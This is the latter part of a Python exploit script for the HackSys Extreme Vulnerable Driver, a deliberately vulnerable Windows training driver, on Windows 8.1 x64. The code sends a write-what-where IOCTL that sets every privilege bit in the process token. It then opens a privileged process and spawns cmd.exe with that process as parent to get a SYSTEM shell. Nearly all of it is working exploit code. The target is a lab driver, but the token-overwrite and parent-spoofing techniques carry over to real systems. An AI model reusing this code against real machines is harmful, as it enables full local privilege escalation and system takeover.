170 |              devicetype = FILE_DEVICE_UNKNOWN,
171 |              access = FILE_ANY_ACCESS,
172 |              method = METHOD_NEITHER):
173 |     """Recreate CTL_CODE macro to generate driver IOCTL."""
174 |     return ((devicetype << 16) | (access << 14) | (function << 2) | method)
175 | 
176 | def trigger(hDevice, dwIoControlCode, tokenAddress):
177 |     """Create evil buffer and send IOCTL."""
178 |     privs = create_string_buffer("\xFF\xFF\xFF\xFF", 4) # ALL THE PRIVILEGES!
179 |     inBuffer = WRITE_WHAT_WHERE()
180 |     inBuffer.What = addressof(privs)
181 |     inBuffer.Where = tokenAddress+0x48 # Offset to privileges bitmask in token
182 |     lpInBuffer = addressof(inBuffer)
183 |     nInBufferSize = sizeof(inBuffer)
184 |     lpOutBuffer = None
185 |     nOutBufferSize = 0
186 |     lpBytesReturned = ULONG()
187 |     lpOverlapped = None
188 |     print "[*]Triggering vulnerable IOCTL..."
189 |     if not DeviceIoControl(hDevice,                # _In_        HANDLE
190 |                            dwIoControlCode,        # _In_        DWORD
191 |                            lpInBuffer,             # _In_opt_    LPVOID
192 |                            nInBufferSize,          # _In_        DWORD
193 |                            lpOutBuffer,            # _Out_opt_   LPVOID
194 |                            nOutBufferSize,         # _In_        DWORD
195 |                            byref(lpBytesReturned), # _Out_opt_   LPDWORD
196 |                            lpOverlapped):          # _Inout_opt_ LPOVERLAPPED
197 |         raise WinError()
198 | 
199 | def getprivilegedhandle(dwProcessId):
200 |     """Retrieve handle to privileged process."""
201 |     dwDesiredAccess = PROCESS_ALL_ACCESS # ayyyyy! lmao
202 |     bInheritHandle = 0
203 |     handle = OpenProcess(dwDesiredAccess,  # _In_ DWORD
204 |                          bInheritHandle,   # _In_ BOOL
205 |                          dwProcessId)      # _In_ DWORD
206 |     if not handle:
207 |         raise WinError()
208 |     
209 |     print "[*]Got handle to privileged process: {:#x}".format(handle)
210 |     return handle
211 | 
212 | def procreate(ParentProcess):
213 |     """Create new process specifying privileged parent."""
214 |     lpAttributeList = None
215 |     dwAttributeCount = 1
216 |     dwFlags = 0
217 |     lpSize = PVOID()
218 |     # Call with null lpAttributeList first to get back the lpSize
219 |     InitializeProcThreadAttributeList(lpAttributeList,  # _Out_opt_  LPPROC_THREAD_ATTRIBUTE_LIST
220 |                                       dwAttributeCount, # _In_       DWORD
221 |                                       dwFlags,          # _Reserved_ DWORD
222 |                                       byref(lpSize))    # _Inout_    PSIZE_T
223 |     
224 |     # Initialize the attribute list
225 |     lpAttributeList = PROC_THREAD_ATTRIBUTE_LIST()
226 |     if not InitializeProcThreadAttributeList(lpAttributeList,  # _Out_opt_  LPPROC_THREAD_ATTRIBUTE_LIST
227 |                                              dwAttributeCount, # _In_       DWORD
228 |                                              dwFlags,          # _Reserved_ DWORD
229 |                                              byref(lpSize)):   # _Inout_    PSIZE_T
230 |         raise WinError()
231 |     
232 |     # Add attribute to attribute list
233 |     Attribute = PROC_THREAD_ATTRIBUTE_PARENT_PROCESS # Specify parent process attribute
234 |     lpValue = PVOID(ParentProcess) # Handle to specified parent
235 |     cbSize = sizeof(lpValue)
236 |     lpPreviousValue = None
237 |     lpReturnSize = None
238 |     if not UpdateProcThreadAttribute(lpAttributeList, # _Inout_   LPPROC_THREAD_ATTRIBUTE_LIST
239 |                                      dwFlags,         # _In_      DWORD
240 |                                      Attribute,       # _In_      DWORD_PTR
241 |                                      byref(lpValue),  # _In_      PVOID
242 |                                      cbSize,          # _In_      SIZE_T
243 |                                      lpPreviousValue, # _Out_opt_ PVOID
244 |                                      lpReturnSize):   # _In_opt_  PSIZE_T
245 |         raise WinError()
246 | 
247 |     print "[*]Spawning shell..."
248 |     lpApplicationName = None
249 |     lpCommandLine = u"c:\\windows\\system32\\cmd.exe" # Unicode
250 |     lpProcessAttributes = None
251 |     lpThreadAttributes = None
252 |     bInheritHandles = 0
253 |     dwCreationFlags = (CREATE_NEW_CONSOLE | EXTENDED_STARTUPINFO_PRESENT)
254 |     lpEnvironment = None
255 |     lpCurrentDirectory = None
256 |     lpStartupInfo = STARTUPINFOEX()
257 |     lpStartupInfo.StartupInfo.cb = sizeof(lpStartupInfo)
258 |     lpStartupInfo.lpAttributeList = addressof(lpAttributeList)
259 |     lpProcessInformation = PROCESS_INFORMATION()
260 |     if not CreateProcess(lpApplicationName,            # _In_opt_      LPCTSTR
261 |                          lpCommandLine,                # _Inout_opt_   LPTSTR
262 |                          lpProcessAttributes,          # _In_opt_      LPSECURITY_ATTRIBUTES
263 |                          lpThreadAttributes,           # _In_opt_      LPSECURITY_ATTRIBUTES
264 |                          bInheritHandles,              # _In_          BOOL
265 |                          dwCreationFlags,              # _In_          DWORD
266 |                          lpEnvironment,                # _In_opt_      LPVOID
267 |                          lpCurrentDirectory,           # _In_opt_      LPCTSTR
268 |                          byref(lpStartupInfo),         # _In_          LPSTARTUPINFO
269 |                          byref(lpProcessInformation)): # _Out_         LPPROCESS_INFORMATION
270 |         raise WinError()
271 | 
272 | def main():
273 |     """Pwn things"""
274 |     print "\n" + "  " + "*"*64
275 |     print "  HackSys Extreme Vulnerable Driver"
276 |     print "  Arbitrary overwrite exploit Windows 8.1 x64"
277 |     print "  by Brian Beaudry (@sizzop)"
278 |     print "\n  Greetz: Ashfaq Ansari (@HackSysTeam) / James Forshaw (@tiraniddo)"
279 |     print "  " + "*"*64 + "\n"
280 |     parser = ArgumentParser()
281 |     parser.add_argument("-p", "--pid", help="PID of privileged process (e.g. SearchIndexer.exe)",
282 |                         type=int, required=True)
283 |     ppid = parser.parse_args().pid
284 |     
285 |     trigger(gethandle(), ctl_code(0x802), getprocesstoken())
286 |     # After gaining SeDebugPrivilege, open a handle to a privileged process
287 |     # so that it can be specified as the parent process for our shell. The
288 |     # shell will inherit the parent's token and run as NT AUTHORITY\SYSTEM.
289 |     # This technique was pointed out by James Forshaw in his Recon 2016 talk
290 |     # https://recon.cx/2016/recordings/recon2016-10-james-forshaw-Process-Failure-Modes.mp4
291 |     privhandle = getprivilegedhandle(ppid)
292 |     procreate(privhandle)
293 | 
294 | if __name__ == "__main__":
295 |     main()


--------------------------------------------------------------------------------